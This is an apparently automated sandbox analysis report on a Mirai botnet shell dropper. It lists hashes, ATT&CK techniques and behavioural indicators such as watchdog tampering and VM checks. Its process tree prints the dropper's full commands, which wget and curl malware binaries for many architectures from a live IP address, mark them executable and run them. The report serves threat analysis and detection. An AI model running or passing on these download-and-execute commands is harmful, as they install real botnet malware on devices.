mirai | 5bac9d684357a86485310dc0f98b63f0f9c0f08e7879c7812a0949ff882fe7c4

Analysis

max time kernel
138s
max time network
150s
platform
debian-9_armhf
resource
debian9-armhf-20240418-en
resource tags

arch:armhfimage:debian9-armhf-20240418-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem
submitted
26-12-2024 21:02

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

ohshit.sh
Size

3KB
MD5

7c5ed3803ed430d1f19ad74fda51642f
SHA1

43d7c9d2e6065acbc7b1440a6e9a60bee8db353b
SHA256

5bac9d684357a86485310dc0f98b63f0f9c0f08e7879c7812a0949ff882fe7c4
SHA512

ff126662eb0097a5554f95a4b91c71481213e45f3f5a98a426ce49c7f15f32b422b2864cd97588d6360014e01e971003cfe1c63e58bc1bfadc38a4d150561565

Score

10^/10

mirai lzrd antivm botnet defense_evasion discovery upx

Malware Config

Extracted

Family

mirai

Botnet

LZRD

Extracted

Family

mirai

Botnet

LZRD

Extracted

Family

mirai

Botnet

LZRD

Signatures

Mirai
Mirai is a prevalent Linux malware infecting exposed network devices.
botnet mirai
Mirai family
mirai

File and Directory Permissions Modification 1 TTPs 15 IoCs

Adversaries may modify file or directory permissions to evade defenses.

defense_evasion

Linux and Mac File and Directory Permissions Modification

T1222.002

pid	Process
841	chmod
706	chmod
763	chmod
816	chmod
835	chmod
781	chmod
799	chmod
848	chmod
671	chmod
684	chmod
787	chmod
804	chmod
829	chmod
732	chmod
744	chmod

Executes dropped EXE 15 IoCs

ioc	pid	Process
/tmp/Chaotic	672	Chaotic
/tmp/Chaotic	685	Chaotic
/tmp/Chaotic	708	Chaotic
/tmp/Chaotic	733	Chaotic
/tmp/Chaotic	745	Chaotic
/tmp/Chaotic	765	Chaotic
/tmp/Chaotic	782	Chaotic
/tmp/Chaotic	788	Chaotic
/tmp/Chaotic	800	Chaotic
/tmp/Chaotic	805	Chaotic
/tmp/Chaotic	817	Chaotic
/tmp/Chaotic	830	Chaotic
/tmp/Chaotic	836	Chaotic
/tmp/Chaotic	842	Chaotic
/tmp/Chaotic	849	Chaotic

Modifies Watchdog functionality 1 TTPs 6 IoCs

Malware like Mirai modifies the Watchdog to prevent it restarting an infected system.

defense_evasion

Impair Defenses

T1562

description	ioc	Process
File opened for modification	/dev/misc/watchdog	Chaotic
File opened for modification	/dev/watchdog	Chaotic
File opened for modification	/dev/misc/watchdog	Chaotic
File opened for modification	/dev/watchdog	Chaotic
File opened for modification	/dev/misc/watchdog	Chaotic
File opened for modification	/dev/watchdog	Chaotic

Enumerates running processes
Discovers information about currently running processes on the system

Writes file to system bin folder 6 IoCs

description	ioc	Process
File opened for modification	/sbin/watchdog	Chaotic
File opened for modification	/bin/watchdog	Chaotic
File opened for modification	/sbin/watchdog	Chaotic
File opened for modification	/bin/watchdog	Chaotic
File opened for modification	/sbin/watchdog	Chaotic
File opened for modification	/bin/watchdog	Chaotic

UPX packed file 4 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/files/fstream-5.dat	upx
behavioral2/files/fstream-6.dat	upx
behavioral2/files/fstream-7.dat	upx
behavioral2/files/fstream-8.dat	upx

Checks CPU configuration 1 TTPs 15 IoCs

Checks CPU information which indicate if the system is a virtual machine.

antivm

System Checks

T1497.001

description	ioc	Process
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl

Reads runtime system information 64 IoCs

Reads data from /proc virtual filesystem.

discovery

description	ioc	Process
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/269/status	Chaotic
File opened for reading	/proc/28/status	Chaotic
File opened for reading	/proc/279/status	Chaotic
File opened for reading	/proc/317/status	Chaotic
File opened for reading	/proc/638/status	Chaotic
File opened for reading	/proc/6/status	Chaotic
File opened for reading	/proc/41/status	Chaotic
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/16/status	Chaotic
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/26/status	Chaotic
File opened for reading	/proc/98/status	Chaotic
File opened for reading	/proc/267/status	Chaotic
File opened for reading	/proc/4/status	Chaotic
File opened for reading	/proc/138/status	Chaotic
File opened for reading	/proc/267/status	Chaotic
File opened for reading	/proc/17/status	Chaotic
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/105/status	Chaotic
File opened for reading	/proc/141/status	Chaotic
File opened for reading	/proc/76/status	Chaotic
File opened for reading	/proc/107/status	Chaotic
File opened for reading	/proc/633/status	Chaotic
File opened for reading	/proc/8/status	Chaotic
File opened for reading	/proc/14/status	Chaotic
File opened for reading	/proc/641/status	Chaotic
File opened for reading	/proc/26/status	Chaotic
File opened for reading	/proc/280/status	Chaotic
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/265/status	Chaotic
File opened for reading	/proc/19/status	Chaotic
File opened for reading	/proc/296/status	Chaotic
File opened for reading	/proc/141/status	Chaotic
File opened for reading	/proc/269/status	Chaotic
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/213/status	Chaotic
File opened for reading	/proc/16/status	Chaotic
File opened for reading	/proc/588/status	Chaotic
File opened for reading	/proc/592/status	Chaotic
File opened for reading	/proc/15/status	Chaotic
File opened for reading	/proc/572/status	Chaotic
File opened for reading	/proc/135/status	Chaotic
File opened for reading	/proc/788/status	Chaotic
File opened for reading	/proc/23/status	Chaotic
File opened for reading	/proc/593/status	Chaotic
File opened for reading	/proc/791/status	Chaotic
File opened for reading	/proc/41/status	Chaotic
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/9/status	Chaotic
File opened for reading	/proc/812/status	Chaotic
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/98/status	Chaotic
File opened for reading	/proc/648/status	Chaotic
File opened for reading	/proc/22/status	Chaotic
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/20/status	Chaotic
File opened for reading	/proc/636/status	Chaotic
File opened for reading	/proc/18/status	Chaotic
File opened for reading	/proc/630/status	Chaotic
File opened for reading	/proc/self/exe	Chaotic
File opened for reading	/proc/28/status	Chaotic
File opened for reading	/proc/sys/crypto/fips_enabled	curl

System Network Configuration Discovery 1 TTPs 6 IoCs

Adversaries may gather information about the network configuration of a system.

discovery

System Network Configuration Discovery

T1016

pid	Process
735	wget
738	curl
742	cat
748	wget
754	curl
762	cat

Writes file to tmp directory 30 IoCs

Malware often drops required files in the /tmp directory.

description	ioc	Process
File opened for modification	/tmp/ub8ehJSePAfc9FYqZIT6.x86_64	curl
File opened for modification	/tmp/ub8ehJSePAfc9FYqZIT6.mips	wget
File opened for modification	/tmp/ub8ehJSePAfc9FYqZIT6.arm	wget
File opened for modification	/tmp/ub8ehJSePAfc9FYqZIT6.arm7	curl
File opened for modification	/tmp/ub8ehJSePAfc9FYqZIT6.x86	curl
File opened for modification	/tmp/ub8ehJSePAfc9FYqZIT6.mpsl	wget
File opened for modification	/tmp/ub8ehJSePAfc9FYqZIT6.mpsl	curl
File opened for modification	/tmp/ub8ehJSePAfc9FYqZIT6.m68k	curl
File opened for modification	/tmp/ub8ehJSePAfc9FYqZIT6.mips64	curl
File opened for modification	/tmp/ub8ehJSePAfc9FYqZIT6.x86	wget
File opened for modification	/tmp/ub8ehJSePAfc9FYqZIT6.x86_64	wget
File opened for modification	/tmp/ub8ehJSePAfc9FYqZIT6.mips	curl
File opened for modification	/tmp/ub8ehJSePAfc9FYqZIT6.ppc	curl
File opened for modification	/tmp/Chaotic	ohshit.sh
File opened for modification	/tmp/ub8ehJSePAfc9FYqZIT6.i686	curl
File opened for modification	/tmp/ub8ehJSePAfc9FYqZIT6.m68k	wget
File opened for modification	/tmp/ub8ehJSePAfc9FYqZIT6.sh4	wget
File opened for modification	/tmp/ub8ehJSePAfc9FYqZIT6.i686	wget
File opened for modification	/tmp/ub8ehJSePAfc9FYqZIT6.sparc	curl
File opened for modification	/tmp/ub8ehJSePAfc9FYqZIT6.sh4	curl
File opened for modification	/tmp/ub8ehJSePAfc9FYqZIT6.arm	curl
File opened for modification	/tmp/ub8ehJSePAfc9FYqZIT6.arm5	wget
File opened for modification	/tmp/ub8ehJSePAfc9FYqZIT6.arm5	curl
File opened for modification	/tmp/ub8ehJSePAfc9FYqZIT6.arm6	wget
File opened for modification	/tmp/ub8ehJSePAfc9FYqZIT6.arm6	curl
File opened for modification	/tmp/ub8ehJSePAfc9FYqZIT6.arm7	wget
File opened for modification	/tmp/busybox	cp
File opened for modification	/tmp/ub8ehJSePAfc9FYqZIT6.arc	curl
File opened for modification	/tmp/ub8ehJSePAfc9FYqZIT6.ppc	wget
File opened for modification	/tmp/ub8ehJSePAfc9FYqZIT6.arc	wget

/tmp/ohshit.sh
/tmp/ohshit.sh
1⤵
- Writes file to tmp directory
PID:638
- /bin/cp
  cp /bin/busybox /tmp/
  2⤵
  - Writes file to tmp directory
  PID:639
- /usr/bin/wget
  wget http://92.118.56.167/HideChaotic/ub8ehJSePAfc9FYqZIT6.arc
  2⤵
  - Writes file to tmp directory
  PID:644
- /usr/bin/curl
  curl -O http://92.118.56.167/HideChaotic/ub8ehJSePAfc9FYqZIT6.arc
  2⤵
  - Checks CPU configuration
  - Writes file to tmp directory
  PID:664
- /bin/cat
  cat ub8ehJSePAfc9FYqZIT6.arc
  2⤵
  PID:670
- /bin/chmod
  chmod +x busybox Chaotic ohshit.sh systemd-private-c551bff430f14e46ad2c32f501677afc-systemd-timedated.service-aREQQh ub8ehJSePAfc9FYqZIT6.arc
  2⤵
  - File and Directory Permissions Modification
  PID:671
- /tmp/Chaotic
  ./Chaotic
  2⤵
  - Executes dropped EXE
  PID:672
- /usr/bin/wget
  wget http://92.118.56.167/HideChaotic/ub8ehJSePAfc9FYqZIT6.x86
  2⤵
  - Writes file to tmp directory
  PID:674
- /usr/bin/curl
  curl -O http://92.118.56.167/HideChaotic/ub8ehJSePAfc9FYqZIT6.x86
  2⤵
  - Checks CPU configuration
  - Reads runtime system information
  - Writes file to tmp directory
  PID:675
- /bin/cat
  cat ub8ehJSePAfc9FYqZIT6.x86
  2⤵
  PID:682
- /bin/chmod
  chmod +x busybox Chaotic ohshit.sh systemd-private-c551bff430f14e46ad2c32f501677afc-systemd-timedated.service-aREQQh ub8ehJSePAfc9FYqZIT6.arc ub8ehJSePAfc9FYqZIT6.x86
  2⤵
  - File and Directory Permissions Modification
  PID:684
- /tmp/Chaotic
  ./Chaotic
  2⤵
  - Executes dropped EXE
  PID:685
- /usr/bin/wget
  wget http://92.118.56.167/HideChaotic/ub8ehJSePAfc9FYqZIT6.x86_64
  2⤵
  - Writes file to tmp directory
  PID:688
- /usr/bin/curl
  curl -O http://92.118.56.167/HideChaotic/ub8ehJSePAfc9FYqZIT6.x86_64
  2⤵
  - Checks CPU configuration
  - Reads runtime system information
  - Writes file to tmp directory
  PID:696
- /bin/cat
  cat ub8ehJSePAfc9FYqZIT6.x86_64
  2⤵
  PID:705
- /bin/chmod
  chmod +x busybox Chaotic ohshit.sh systemd-private-c551bff430f14e46ad2c32f501677afc-systemd-timedated.service-aREQQh ub8ehJSePAfc9FYqZIT6.arc ub8ehJSePAfc9FYqZIT6.x86 ub8ehJSePAfc9FYqZIT6.x86_64
  2⤵
  - File and Directory Permissions Modification
  PID:706
- /tmp/Chaotic
  ./Chaotic
  2⤵
  - Executes dropped EXE
  PID:708
- /usr/bin/wget
  wget http://92.118.56.167/HideChaotic/ub8ehJSePAfc9FYqZIT6.i686
  2⤵
  - Writes file to tmp directory
  PID:710
- /usr/bin/curl
  curl -O http://92.118.56.167/HideChaotic/ub8ehJSePAfc9FYqZIT6.i686
  2⤵
  - Checks CPU configuration
  - Writes file to tmp directory
  PID:719
- /bin/cat
  cat ub8ehJSePAfc9FYqZIT6.i686
  2⤵
  PID:730
- /bin/chmod
  chmod +x busybox Chaotic ohshit.sh systemd-private-c551bff430f14e46ad2c32f501677afc-systemd-timedated.service-aREQQh ub8ehJSePAfc9FYqZIT6.arc ub8ehJSePAfc9FYqZIT6.i686 ub8ehJSePAfc9FYqZIT6.x86 ub8ehJSePAfc9FYqZIT6.x86_64
  2⤵
  - File and Directory Permissions Modification
  PID:732
- /tmp/Chaotic
  ./Chaotic
  2⤵
  - Executes dropped EXE
  PID:733
- /usr/bin/wget
  wget http://92.118.56.167/HideChaotic/ub8ehJSePAfc9FYqZIT6.mips
  2⤵
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:735
- /usr/bin/curl
  curl -O http://92.118.56.167/HideChaotic/ub8ehJSePAfc9FYqZIT6.mips
  2⤵
  - Checks CPU configuration
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:738
- /bin/cat
  cat ub8ehJSePAfc9FYqZIT6.mips
  2⤵
  - System Network Configuration Discovery
  PID:742
- /bin/chmod
  chmod +x busybox Chaotic ohshit.sh systemd-private-c551bff430f14e46ad2c32f501677afc-systemd-timedated.service-aREQQh ub8ehJSePAfc9FYqZIT6.arc ub8ehJSePAfc9FYqZIT6.i686 ub8ehJSePAfc9FYqZIT6.mips ub8ehJSePAfc9FYqZIT6.x86 ub8ehJSePAfc9FYqZIT6.x86_64
  2⤵
  - File and Directory Permissions Modification
  PID:744
- /tmp/Chaotic
  ./Chaotic
  2⤵
  - Executes dropped EXE
  PID:745
- /usr/bin/wget
  wget http://92.118.56.167/HideChaotic/ub8ehJSePAfc9FYqZIT6.mips64
  2⤵
  - System Network Configuration Discovery
  PID:748
- /usr/bin/curl
  curl -O http://92.118.56.167/HideChaotic/ub8ehJSePAfc9FYqZIT6.mips64
  2⤵
  - Checks CPU configuration
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:754
- /bin/cat
  cat ub8ehJSePAfc9FYqZIT6.mips64
  2⤵
  - System Network Configuration Discovery
  PID:762
- /bin/chmod
  chmod +x busybox Chaotic ohshit.sh systemd-private-c551bff430f14e46ad2c32f501677afc-systemd-timedated.service-aREQQh ub8ehJSePAfc9FYqZIT6.arc ub8ehJSePAfc9FYqZIT6.i686 ub8ehJSePAfc9FYqZIT6.mips ub8ehJSePAfc9FYqZIT6.mips64 ub8ehJSePAfc9FYqZIT6.x86 ub8ehJSePAfc9FYqZIT6.x86_64
  2⤵
  - File and Directory Permissions Modification
  PID:763
- /tmp/Chaotic
  ./Chaotic
  2⤵
  - Executes dropped EXE
  PID:765
- /usr/bin/wget
  wget http://92.118.56.167/HideChaotic/ub8ehJSePAfc9FYqZIT6.mpsl
  2⤵
  - Writes file to tmp directory
  PID:766
- /usr/bin/curl
  curl -O http://92.118.56.167/HideChaotic/ub8ehJSePAfc9FYqZIT6.mpsl
  2⤵
  - Checks CPU configuration
  - Reads runtime system information
  - Writes file to tmp directory
  PID:777
- /bin/cat
  cat ub8ehJSePAfc9FYqZIT6.mpsl
  2⤵
  PID:780
- /bin/chmod
  chmod +x busybox Chaotic ohshit.sh systemd-private-c551bff430f14e46ad2c32f501677afc-systemd-timedated.service-aREQQh ub8ehJSePAfc9FYqZIT6.arc ub8ehJSePAfc9FYqZIT6.i686 ub8ehJSePAfc9FYqZIT6.mips ub8ehJSePAfc9FYqZIT6.mips64 ub8ehJSePAfc9FYqZIT6.mpsl ub8ehJSePAfc9FYqZIT6.x86 ub8ehJSePAfc9FYqZIT6.x86_64
  2⤵
  - File and Directory Permissions Modification
  PID:781
- /tmp/Chaotic
  ./Chaotic
  2⤵
  - Executes dropped EXE
  PID:782
- /usr/bin/wget
  wget http://92.118.56.167/HideChaotic/ub8ehJSePAfc9FYqZIT6.arm
  2⤵
  - Writes file to tmp directory
  PID:784
- /usr/bin/curl
  curl -O http://92.118.56.167/HideChaotic/ub8ehJSePAfc9FYqZIT6.arm
  2⤵
  - Checks CPU configuration
  - Reads runtime system information
  - Writes file to tmp directory
  PID:785
- /bin/cat
  cat ub8ehJSePAfc9FYqZIT6.arm
  2⤵
  PID:786
- /bin/chmod
  chmod +x busybox Chaotic ohshit.sh systemd-private-c551bff430f14e46ad2c32f501677afc-systemd-timedated.service-aREQQh ub8ehJSePAfc9FYqZIT6.arc ub8ehJSePAfc9FYqZIT6.arm ub8ehJSePAfc9FYqZIT6.i686 ub8ehJSePAfc9FYqZIT6.mips ub8ehJSePAfc9FYqZIT6.mips64 ub8ehJSePAfc9FYqZIT6.mpsl ub8ehJSePAfc9FYqZIT6.x86 ub8ehJSePAfc9FYqZIT6.x86_64
  2⤵
  - File and Directory Permissions Modification
  PID:787
- /tmp/Chaotic
  ./Chaotic
  2⤵
  - Executes dropped EXE
  - Modifies Watchdog functionality
  - Writes file to system bin folder
  - Reads runtime system information
  PID:788
- /usr/bin/wget
  wget http://92.118.56.167/HideChaotic/ub8ehJSePAfc9FYqZIT6.arm5
  2⤵
  - Writes file to tmp directory
  PID:796
- /usr/bin/curl
  curl -O http://92.118.56.167/HideChaotic/ub8ehJSePAfc9FYqZIT6.arm5
  2⤵
  - Checks CPU configuration
  - Writes file to tmp directory
  PID:797
- /bin/cat
  cat ub8ehJSePAfc9FYqZIT6.arm5
  2⤵
  PID:798
- /bin/chmod
  chmod +x busybox Chaotic ohshit.sh systemd-private-c551bff430f14e46ad2c32f501677afc-systemd-timedated.service-aREQQh ub8ehJSePAfc9FYqZIT6.arc ub8ehJSePAfc9FYqZIT6.arm ub8ehJSePAfc9FYqZIT6.arm5 ub8ehJSePAfc9FYqZIT6.i686 ub8ehJSePAfc9FYqZIT6.mips ub8ehJSePAfc9FYqZIT6.mips64 ub8ehJSePAfc9FYqZIT6.mpsl ub8ehJSePAfc9FYqZIT6.x86 ub8ehJSePAfc9FYqZIT6.x86_64
  2⤵
  - File and Directory Permissions Modification
  PID:799
- /tmp/Chaotic
  ./Chaotic
  2⤵
  - Executes dropped EXE
  PID:800
- /usr/bin/wget
  wget http://92.118.56.167/HideChaotic/ub8ehJSePAfc9FYqZIT6.arm6
  2⤵
  - Writes file to tmp directory
  PID:801
- /usr/bin/curl
  curl -O http://92.118.56.167/HideChaotic/ub8ehJSePAfc9FYqZIT6.arm6
  2⤵
  - Checks CPU configuration
  - Reads runtime system information
  - Writes file to tmp directory
  PID:802
- /bin/cat
  cat ub8ehJSePAfc9FYqZIT6.arm6
  2⤵
  PID:803
- /bin/chmod
  chmod +x busybox Chaotic ohshit.sh systemd-private-c551bff430f14e46ad2c32f501677afc-systemd-timedated.service-aREQQh ub8ehJSePAfc9FYqZIT6.arc ub8ehJSePAfc9FYqZIT6.arm ub8ehJSePAfc9FYqZIT6.arm5 ub8ehJSePAfc9FYqZIT6.arm6 ub8ehJSePAfc9FYqZIT6.i686 ub8ehJSePAfc9FYqZIT6.mips ub8ehJSePAfc9FYqZIT6.mips64 ub8ehJSePAfc9FYqZIT6.mpsl ub8ehJSePAfc9FYqZIT6.x86 ub8ehJSePAfc9FYqZIT6.x86_64
  2⤵
  - File and Directory Permissions Modification
  PID:804
- /tmp/Chaotic
  ./Chaotic
  2⤵
  - Executes dropped EXE
  - Modifies Watchdog functionality
  - Writes file to system bin folder
  - Reads runtime system information
  PID:805
- /usr/bin/wget
  wget http://92.118.56.167/HideChaotic/ub8ehJSePAfc9FYqZIT6.arm7
  2⤵
  - Writes file to tmp directory
  PID:813
- /usr/bin/curl
  curl -O http://92.118.56.167/HideChaotic/ub8ehJSePAfc9FYqZIT6.arm7
  2⤵
  - Checks CPU configuration
  - Reads runtime system information
  - Writes file to tmp directory
  PID:814
- /bin/cat
  cat ub8ehJSePAfc9FYqZIT6.arm7
  2⤵
  PID:815
- /bin/chmod
  chmod +x busybox Chaotic ohshit.sh systemd-private-c551bff430f14e46ad2c32f501677afc-systemd-timedated.service-aREQQh ub8ehJSePAfc9FYqZIT6.arc ub8ehJSePAfc9FYqZIT6.arm ub8ehJSePAfc9FYqZIT6.arm5 ub8ehJSePAfc9FYqZIT6.arm6 ub8ehJSePAfc9FYqZIT6.arm7 ub8ehJSePAfc9FYqZIT6.i686 ub8ehJSePAfc9FYqZIT6.mips ub8ehJSePAfc9FYqZIT6.mips64 ub8ehJSePAfc9FYqZIT6.mpsl ub8ehJSePAfc9FYqZIT6.x86 ub8ehJSePAfc9FYqZIT6.x86_64
  2⤵
  - File and Directory Permissions Modification
  PID:816
- /tmp/Chaotic
  ./Chaotic
  2⤵
  - Executes dropped EXE
  - Modifies Watchdog functionality
  - Writes file to system bin folder
  - Reads runtime system information
  PID:817
- /usr/bin/wget
  wget http://92.118.56.167/HideChaotic/ub8ehJSePAfc9FYqZIT6.ppc
  2⤵
  - Writes file to tmp directory
  PID:826
- /usr/bin/curl
  curl -O http://92.118.56.167/HideChaotic/ub8ehJSePAfc9FYqZIT6.ppc
  2⤵
  - Checks CPU configuration
  - Reads runtime system information
  - Writes file to tmp directory
  PID:827
- /bin/cat
  cat ub8ehJSePAfc9FYqZIT6.ppc
  2⤵
  PID:828
- /bin/chmod
  chmod +x busybox Chaotic ohshit.sh ub8ehJSePAfc9FYqZIT6.arc ub8ehJSePAfc9FYqZIT6.arm ub8ehJSePAfc9FYqZIT6.arm5 ub8ehJSePAfc9FYqZIT6.arm6 ub8ehJSePAfc9FYqZIT6.arm7 ub8ehJSePAfc9FYqZIT6.i686 ub8ehJSePAfc9FYqZIT6.mips ub8ehJSePAfc9FYqZIT6.mips64 ub8ehJSePAfc9FYqZIT6.mpsl ub8ehJSePAfc9FYqZIT6.ppc ub8ehJSePAfc9FYqZIT6.x86 ub8ehJSePAfc9FYqZIT6.x86_64
  2⤵
  - File and Directory Permissions Modification
  PID:829
- /tmp/Chaotic
  ./Chaotic
  2⤵
  - Executes dropped EXE
  PID:830
- /usr/bin/wget
  wget http://92.118.56.167/HideChaotic/ub8ehJSePAfc9FYqZIT6.sparc
  2⤵
  PID:832
- /usr/bin/curl
  curl -O http://92.118.56.167/HideChaotic/ub8ehJSePAfc9FYqZIT6.sparc
  2⤵
  - Checks CPU configuration
  - Writes file to tmp directory
  PID:833
- /bin/cat
  cat ub8ehJSePAfc9FYqZIT6.sparc
  2⤵
  PID:834
- /bin/chmod
  chmod +x busybox Chaotic ohshit.sh ub8ehJSePAfc9FYqZIT6.arc ub8ehJSePAfc9FYqZIT6.arm ub8ehJSePAfc9FYqZIT6.arm5 ub8ehJSePAfc9FYqZIT6.arm6 ub8ehJSePAfc9FYqZIT6.arm7 ub8ehJSePAfc9FYqZIT6.i686 ub8ehJSePAfc9FYqZIT6.mips ub8ehJSePAfc9FYqZIT6.mips64 ub8ehJSePAfc9FYqZIT6.mpsl ub8ehJSePAfc9FYqZIT6.ppc ub8ehJSePAfc9FYqZIT6.sparc ub8ehJSePAfc9FYqZIT6.x86 ub8ehJSePAfc9FYqZIT6.x86_64
  2⤵
  - File and Directory Permissions Modification
  PID:835
- /tmp/Chaotic
  ./Chaotic
  2⤵
  - Executes dropped EXE
  PID:836
- /usr/bin/wget
  wget http://92.118.56.167/HideChaotic/ub8ehJSePAfc9FYqZIT6.m68k
  2⤵
  - Writes file to tmp directory
  PID:837
- /usr/bin/curl
  curl -O http://92.118.56.167/HideChaotic/ub8ehJSePAfc9FYqZIT6.m68k
  2⤵
  - Checks CPU configuration
  - Reads runtime system information
  - Writes file to tmp directory
  PID:838
- /bin/cat
  cat ub8ehJSePAfc9FYqZIT6.m68k
  2⤵
  PID:840
- /bin/chmod
  chmod +x busybox Chaotic ohshit.sh ub8ehJSePAfc9FYqZIT6.arc ub8ehJSePAfc9FYqZIT6.arm ub8ehJSePAfc9FYqZIT6.arm5 ub8ehJSePAfc9FYqZIT6.arm6 ub8ehJSePAfc9FYqZIT6.arm7 ub8ehJSePAfc9FYqZIT6.i686 ub8ehJSePAfc9FYqZIT6.m68k ub8ehJSePAfc9FYqZIT6.mips ub8ehJSePAfc9FYqZIT6.mips64 ub8ehJSePAfc9FYqZIT6.mpsl ub8ehJSePAfc9FYqZIT6.ppc ub8ehJSePAfc9FYqZIT6.sparc ub8ehJSePAfc9FYqZIT6.x86 ub8ehJSePAfc9FYqZIT6.x86_64
  2⤵
  - File and Directory Permissions Modification
  PID:841
- /tmp/Chaotic
  ./Chaotic
  2⤵
  - Executes dropped EXE
  PID:842
- /usr/bin/wget
  wget http://92.118.56.167/HideChaotic/ub8ehJSePAfc9FYqZIT6.sh4
  2⤵
  - Writes file to tmp directory
  PID:844
- /usr/bin/curl
  curl -O http://92.118.56.167/HideChaotic/ub8ehJSePAfc9FYqZIT6.sh4
  2⤵
  - Checks CPU configuration
  - Reads runtime system information
  - Writes file to tmp directory
  PID:846
- /bin/cat
  cat ub8ehJSePAfc9FYqZIT6.sh4
  2⤵
  PID:847
- /bin/chmod
  chmod +x busybox Chaotic ohshit.sh ub8ehJSePAfc9FYqZIT6.arc ub8ehJSePAfc9FYqZIT6.arm ub8ehJSePAfc9FYqZIT6.arm5 ub8ehJSePAfc9FYqZIT6.arm6 ub8ehJSePAfc9FYqZIT6.arm7 ub8ehJSePAfc9FYqZIT6.i686 ub8ehJSePAfc9FYqZIT6.m68k ub8ehJSePAfc9FYqZIT6.mips ub8ehJSePAfc9FYqZIT6.mips64 ub8ehJSePAfc9FYqZIT6.mpsl ub8ehJSePAfc9FYqZIT6.ppc ub8ehJSePAfc9FYqZIT6.sh4 ub8ehJSePAfc9FYqZIT6.sparc ub8ehJSePAfc9FYqZIT6.x86 ub8ehJSePAfc9FYqZIT6.x86_64
  2⤵
  - File and Directory Permissions Modification
  PID:848
- /tmp/Chaotic
  ./Chaotic
  2⤵
  - Executes dropped EXE
  PID:849

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

File and Directory Permissions Modification

T1222

Linux and Mac File and Directory Permissions Modification

T1222.002

Impair Defenses

T1562

Virtualization/Sandbox Evasion

T1497

System Checks

T1497.001

Credential Access

Discovery

System Network Configuration Discovery

T1016

Virtualization/Sandbox Evasion

T1497

System Checks

T1497.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

/tmp/Chaotic

Filesize
37KB

MD5
cab2fc62b63f28cd95c3fdca9ecec6d0

SHA1
df33b92944b8436e7310b0a03ca9038b70c65a56

SHA256
8436a21f6e581d533cc9d3f9b292c89aa171b6c8f560f3baf666b00556b60871

SHA512
dd2bdb170092fc31e19e072f4b637ccff00a26ca59ddb4e02f01ff189d382c8f0b267eafd3b508ee9fffb076ac8204e2453a6769f7bb2a25b40fd043dd7d2224

Download Submit
/tmp/Chaotic

Filesize
36KB

MD5
8c12d2392db8546a0f1a870c8d8da4bb

SHA1
41857b0229bb9533a6e9949b30b593504ab05404

SHA256
c161ac5c4cf291df85f5aa76370cce82b05a99901821ef294052ab788e1e4479

SHA512
6c47d0d9c80681443b8fab1490ab9eb7081a5aa3242b26dc7e38789a1e8d8825b32b0e95209de17df338f15a6900e9d39e906005e9dc660f86292944209a3323

Download Submit
/tmp/Chaotic

Filesize
37KB

MD5
a1f76b42767974d8df0e46ae67cabd0f

SHA1
f8e929ce4a60ea8e8d471264d4ffbb1b3717d638

SHA256
7572e4b384752ae36079a75cf137b1a3599dd0ff1f31cb3a986926bb230cd8fb

SHA512
884f247c390aa06c023c7e398bf0ff80945371ad21683eee41c264b79f2cd5ff26b7dafb39fb85911c12b5b5310b702ef80b3933a1f35c0a3ad8b5b272541043

Download Submit
/tmp/Chaotic

Filesize
43KB

MD5
64fa0599b70a18403044c5ead883bb4a

SHA1
a36e9a7e4989cacce45ab21473fc96f450d1585a

SHA256
036a4c6d7e77446c407820f59b351b834aa4cb0c7d3075aed5830474bc355f90

SHA512
5b8738b611cf774d494dec0703e19c5fc54a246eb27e08c6f7a1a1be72aeccd5ee8bdb6916c0676a3bc6625954a91a6f02441ecc2903d7d5a5db072d2f323b85

Download Submit
/tmp/Chaotic

Filesize
95KB

MD5
bfa8c14219c81fedb6df65b1e34bf0cd

SHA1
44296a9b7a6c6169957746fcfeef10903d89c6c6

SHA256
09c681ef2234341e1ba972412d929cd4a4c1c0b5f486b7543008157a0efa7ecc

SHA512
8783c57a78de7d6a66644aa6ba895ae97b0b1825a0cab6a1741c2ed6f9b8226cbf7eb08e5ead6d7543320be1f3847ef1f98bdcb8f11e9c67d1ee17523d45ec0c

Download Submit
/tmp/busybox

Filesize
507KB

MD5
e588bcf03ae78237b58899d35f50c570

SHA1
2194732ebbefbc27bdae876c77f2a97a20175710

SHA256
2dd1fbb8052a89f40c2e9af115d31346e554ee746e9c7a97d651e43e0609df88

SHA512
904d906ec73ba5f828ee453acfceaf60d07b337a4baf1a88a2edba8d4568e4a3ceae2e24116af0a5b9c8ad194faa72abb62a72d30ae236b0852827c7bf896555

Download Submit
/tmp/ub8ehJSePAfc9FYqZIT6.arc

Filesize
113KB

MD5
252405874b163d27f4b275dfdc52df3f

SHA1
7b854e1e3cbf34c4833e9efe5213596a5922e3a7

SHA256
d90c92338314e3a2dcc1beba3fe072b3b0223191753c6c368c0f87ee0f6a8e0b

SHA512
